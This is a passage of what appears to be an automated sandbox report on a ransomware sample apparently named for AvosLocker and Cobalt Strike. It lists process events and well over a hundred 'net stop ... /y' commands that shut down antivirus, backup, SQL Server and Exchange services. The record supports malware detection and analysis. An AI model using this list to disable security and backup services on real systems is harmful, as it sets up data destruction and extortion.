PID 3996 wrote to memory of 1944 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3996 wrote to memory of 1944 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3996 wrote to memory of 1944 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1856 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 1568 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1568 wrote to memory of 2464 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1568 wrote to memory of 2464 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1568 wrote to memory of 2464 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1856 wrote to memory of 3724 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 3724 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 3724 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 3724 wrote to memory of 3524 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3724 wrote to memory of 3524 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3724 wrote to memory of 3524 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1856 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 1856 wrote to memory of 4092 N/A C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe C:\Windows\SysWOW64\net.exe
PID 4092 wrote to memory of 1532 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe

Processes

C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe

"C:\Users\Admin\AppData\Local\Temp\20241002ec5b1a6de3564c26c4e0e804e6bc2ecbavoslockercobaltstrike.exe"

C:\Windows\SysWOW64\net.exe

net stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net.exe

net stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Agent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Agent" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos AutoUpdate Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos AutoUpdate Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Clean Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Clean Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Device Control Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Device Control Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos File Scanner Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos File Scanner Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Health Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Health Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos MCS Agent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos MCS Agent" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos MCS Client" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos MCS Client" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Message Router" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Message Router" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Safestore Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Safestore Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos System Protection Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos System Protection Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Sophos Web Control Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Sophos Web Control Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Symantec System Recovery" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Symantec System Recovery" /y

C:\Windows\SysWOW64\net.exe

net stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net.exe

net stop "AcronisAgent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "AcronisAgent" /y

C:\Windows\SysWOW64\net.exe

net stop "AcrSch2Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "AcrSch2Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "Antivirus" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Antivirus" /y

C:\Windows\SysWOW64\net.exe

net stop "ARSM" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ARSM" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecAgentAccelerator" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecAgentAccelerator" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecAgentBrowser" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecAgentBrowser" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecDeviceMediaService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecDeviceMediaService" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecJobEngine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecJobEngine" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecManagementService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecManagementService" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecRPCService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecRPCService" /y

C:\Windows\SysWOW64\net.exe

net stop "BackupExecVSSProvider" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "BackupExecVSSProvider" /y

C:\Windows\SysWOW64\net.exe

net stop "bedbg" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "bedbg" /y

C:\Windows\SysWOW64\net.exe

net stop "DCAgent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "DCAgent" /y

C:\Windows\SysWOW64\net.exe

net stop "EPSecurityService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EPSecurityService" /y

C:\Windows\SysWOW64\net.exe

net stop "EPUpdateService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EPUpdateService" /y

C:\Windows\SysWOW64\net.exe

net stop "EraserSvc11710" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EraserSvc11710" /y

C:\Windows\SysWOW64\net.exe

net stop "EsgShKernel" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EsgShKernel" /y

C:\Windows\SysWOW64\net.exe

net stop "FA_Scheduler" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "FA_Scheduler" /y

C:\Windows\SysWOW64\net.exe

net stop "IISAdmin" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "IISAdmin" /y

C:\Windows\SysWOW64\net.exe

net stop "IMAP4Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "IMAP4Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "macmnsvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "macmnsvc" /y

C:\Windows\SysWOW64\net.exe

net stop "masvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "masvc" /y

C:\Windows\SysWOW64\net.exe

net stop "MBAMService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MBAMService" /y

C:\Windows\SysWOW64\net.exe

net stop "MBEndpointAgent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MBEndpointAgent" /y

C:\Windows\SysWOW64\net.exe

net stop "McAfeeEngineService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McAfeeEngineService" /y

C:\Windows\SysWOW64\net.exe

net stop "McAfeeFramework" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McAfeeFramework" /y

C:\Windows\SysWOW64\net.exe

net stop "McAfeeFrameworkMcAfeeFramework" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McAfeeFrameworkMcAfeeFramework" /y

C:\Windows\SysWOW64\net.exe

net stop "McShield" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McShield" /y

C:\Windows\SysWOW64\net.exe

net stop "McTaskManager" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "McTaskManager" /y

C:\Windows\SysWOW64\net.exe

net stop "mfemms" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mfemms" /y

C:\Windows\SysWOW64\net.exe

net stop "mfevtp" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mfevtp" /y

C:\Windows\SysWOW64\net.exe

net stop "MMS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MMS" /y

C:\Windows\SysWOW64\net.exe

net stop "mozyprobackup" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mozyprobackup" /y

C:\Windows\SysWOW64\net.exe

net stop "MsDtsServer" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MsDtsServer" /y

C:\Windows\SysWOW64\net.exe

net stop "MsDtsServer100" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MsDtsServer100" /y

C:\Windows\SysWOW64\net.exe

net stop "MsDtsServer110" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MsDtsServer110" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeES" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeES" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeIS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeIS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeMGMT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeMGMT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeMTA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeMTA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeSA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeSA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSExchangeSRS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSExchangeSRS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSOLAP$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSOLAP$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$BKUPEXEC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$BKUPEXEC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$ECWDB2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$ECWDB2" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PRACTICEMGT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PRACTICEMGT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SBSMONITORING" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SBSMONITORING" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SHAREPOINT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SHAREPOINT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SBSMONITORING" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SBSMONITORING" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SHAREPOINT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHAREPOINT" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLFDLauncher$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLFDLauncher$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLSERVER" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLSERVER" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLServerADHelper100" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLServerADHelper100" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLServerOLAPService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLServerOLAPService" /y

C:\Windows\SysWOW64\net.exe

net stop "MySQL80" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MySQL80" /y

C:\Windows\SysWOW64\net.exe

net stop "MySQL57" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MySQL57" /y

C:\Windows\SysWOW64\net.exe

net stop "ntrtscan" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ntrtscan" /y

C:\Windows\SysWOW64\net.exe

net stop "OracleClientCache80" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "OracleClientCache80" /y

C:\Windows\SysWOW64\net.exe

net stop "PDVFSService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "PDVFSService" /y

C:\Windows\SysWOW64\net.exe

net stop "POP3Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "POP3Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "ReportServer$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ReportServer$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "RESvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "RESvc" /y

C:\Windows\SysWOW64\net.exe

net stop "sacsvr" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "sacsvr" /y

C:\Windows\SysWOW64\net.exe

net stop "SamSs" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SysWOW64\net.exe

net stop "SAVAdminService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SAVAdminService" /y

C:\Windows\SysWOW64\net.exe

net stop "SAVService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SAVService" /y

C:\Windows\SysWOW64\net.exe

net stop "SDRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SysWOW64\net.exe

net stop "SepMasterService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SepMasterService" /y

C:\Windows\SysWOW64\net.exe

net stop "ShMonitor" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ShMonitor" /y

C:\Windows\SysWOW64\net.exe

net stop "Smcinst" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Smcinst" /y

C:\Windows\SysWOW64\net.exe

net stop "SmcService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SmcService" /y

C:\Windows\SysWOW64\net.exe

net stop "SMTPSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SMTPSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "SNAC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SNAC" /y

C:\Windows\SysWOW64\net.exe

net stop "SntpService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SntpService" /y

C:\Windows\SysWOW64\net.exe

net stop "sophossps" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "sophossps" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$BKUPEXEC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$BKUPEXEC" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$ECWDB2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$ECWDB2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEBGC" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PRACTTICEMGT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PRACTTICEMGT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PROFXENGAGEMENT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SBSMONITORING" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SBSMONITORING" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SHAREPOINT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SHAREPOINT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SQL_2008" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SQL_2008" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SYSTEM_BGC" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$TPS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$TPS" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$TPSAMA" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$TPSAMA" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLBrowser" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLBrowser" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLSafeOLRService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLSafeOLRService" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLSERVERAGENT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLSERVERAGENT" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLTELEMETRY" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLTELEMETRY" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLTELEMETRY$ECWDB2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLTELEMETRY$ECWDB2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLWriter" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLWriter" /y

C:\Windows\SysWOW64\net.exe

net stop "SstpSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "svcGenericHost" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "svcGenericHost" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_filter" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_filter" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_service" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_update_64" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_update_64" /y

C:\Windows\SysWOW64\net.exe

net stop "TmCCSF" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TmCCSF" /y

C:\Windows\SysWOW64\net.exe

net stop "tmlisten" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "tmlisten" /y

C:\Windows\SysWOW64\net.exe

net stop "TrueKey" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TrueKey" /y

C:\Windows\SysWOW64\net.exe

net stop "TrueKeyScheduler" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TrueKeyScheduler" /y

C:\Windows\SysWOW64\net.exe

net stop "TrueKeyServiceHelper" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TrueKeyServiceHelper" /y

C:\Windows\SysWOW64\net.exe

net stop "UI0Detect" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamBackupSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamBackupSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamBrokerSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamBrokerSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamCatalogSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamCatalogSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamCloudSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamCloudSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamDeploymentService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamDeploymentService" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamDeploySvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamDeploySvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamEnterpriseManagerSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamEnterpriseManagerSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamMountSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamMountSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamNFSSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamNFSSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamRESTSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamRESTSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamTransportSvc" /y

C:\Windows\SysWOW64\net1.exe

